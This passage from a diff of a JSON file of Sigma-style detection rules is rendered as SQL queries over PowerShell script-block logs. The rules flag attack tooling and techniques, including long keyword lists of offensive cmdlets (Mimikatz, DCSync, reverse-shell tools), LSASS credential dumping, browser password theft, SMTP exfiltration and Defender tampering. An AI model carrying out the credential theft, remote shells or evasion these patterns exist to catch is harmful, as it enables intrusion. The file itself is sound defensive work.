'%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "status": "experimental", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration", + "attack.t1048.003" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], + "filename": "posh_ps_send_mailmessage.yml" + }, + { + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_frombase64string_archive.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001" + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { "title": "PowerShell Remote Session Creation", @@ -5632,15 +5489,28 @@ "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.credential_access", "attack.execution", "attack.t1059.001" ], @@ -5649,94 +5519,99 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -5745,170 +5620,153 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Troubleshooting Pack Cmdlet Execution", + "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE 